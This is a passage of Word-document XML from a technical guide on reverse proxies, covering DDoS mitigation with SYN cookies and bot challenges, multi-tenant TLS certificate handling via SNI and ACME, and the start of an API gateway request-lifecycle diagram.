      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> WAF rules have confidence scores. Low-confidence matches log only. High-confidence matches block. Tuning WAF rules for a specific application is an ongoing operational task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D015F15" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 DDoS Protection Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A99DE5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How proxy-based DDoS mitigation works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B17EF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 3/4 (volumetric) protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3071F914" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="650"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy network absorbs massive traffic volumes (Cloudflare handles 100+ Tbps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D3229" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="650"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>BGP anycast distributes the attack across hundreds of PoPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A03B8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="650"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Each PoP applies packet-level filtering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD85DB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="650"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Rate limit SYN packets (SYN flood mitigation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E64FE7F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="650"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Block amplification protocols (NTP, DNS reflection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7384231A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="650"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Use SYN cookies (handle TCP handshake statelessly under flood).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F439BE6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How SYN cookies work internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC09F58" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Under SYN flood, the proxy doesn't allocate memory for half-open connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BADD62D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Instead, it encodes connection state INTO the SYN-ACK's sequence number (cryptographic function of client IP, port, timestamp).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FE42B5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Only if the client completes the handshake (sends valid ACK with the encoded value +1) does the proxy allocate state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351E2BC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Attackers sending spoofed SYN packets never complete the handshake → no resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17741CFE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 7 (application) protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88F5D1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>JavaScript challenge: Serve a page requiring JavaScript execution. Real browsers execute it; simple bots can't.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4B3FF3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>CAPTCHA for suspicious requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE10BC5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Behavioral fingerprinting: mouse movements, request patterns, TLS fingerprint (JA3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D4AC6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Rate limiting per IP/session/API key with intelligent thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A6F56" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 TLS/SSL Proxy — Certificate Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350E152D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How the proxy handles TLS for many domains (multi-tenant):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F3E81" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SNI (Server Name Indication):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131DCEEE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends Client Hello with SNI: server_name=example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799841DF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy has hundreds of certificates loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123F7CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Based on SNI, proxy selects the correct certificate to present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE673FA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>TLS handshake completes with the right certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FC0501" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wildcard and SAN certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958C044" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="654"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>One certificate covers *.example.com (all subdomains).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD4E6CB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="654"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>SAN (Subject Alternative Name): one certificate lists multiple domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6B769" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="654"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Reduces certificate management overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD723CB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automatic certificate management (Let's Encrypt + ACME):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484E4C3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Modern reverse proxies (Caddy, Traefik) automatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1948C14B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="655"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Detect when a new domain is configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C136B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="655"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Request a certificate from Let's Encrypt via the ACME protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F1BA0E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="655"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Complete the challenge (HTTP-01 or DNS-01).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B57D2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="655"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Install the certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE4D7A0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="655"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Renew automatically before expiration (every 60 days).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2830E1C7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>All without human intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76526229" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="57A79A83">
          <v:rect id="_x0000_i3322" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="518CBB0D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. API Gateway — The Application-Level Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF0BAD1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 What an API Gateway Does Beyond Basic Proxying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143B9648" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>An API gateway is a specialized reverse proxy designed for API traffic. It adds layers of functionality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D00FE07" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request lifecycle in an API gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1E4363" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360BF592" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D8BC42" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBAD7C4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F43EFD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[TLS Termination]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33214002" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA16D3D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E86ED6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Rate Limiting] ────→ 429 Too Many Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0F1FD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D80667A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E841FE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Authentication] ────→ 401 Unauthorized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063887DE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │ (validate JWT/API key/OAuth token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C0F3EA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225A2E8D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Authorization] ────→ 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B8A931" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │ (check permissions for this endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3FB210" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299EF3FE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Request Transformation]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52032B7E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │ (rename headers, rewrite body, version mapping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA860E8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A7FD7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Routing]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2759F5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │ (path-based → select backend service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B2F9C6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24FEBE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Load Balancing]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D8262" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │ (choose specific backend instance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498FCEC1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFBA432" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Backend Request]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD6E316" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD2A36C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD45DAC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Response Transformation]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A57A4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     │ (filter fields, rename, format)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A10558" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456E7D9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>[Logging/Metrics/Tracing]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509325F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     │</w:t>
      </w:r>
    </w:p>
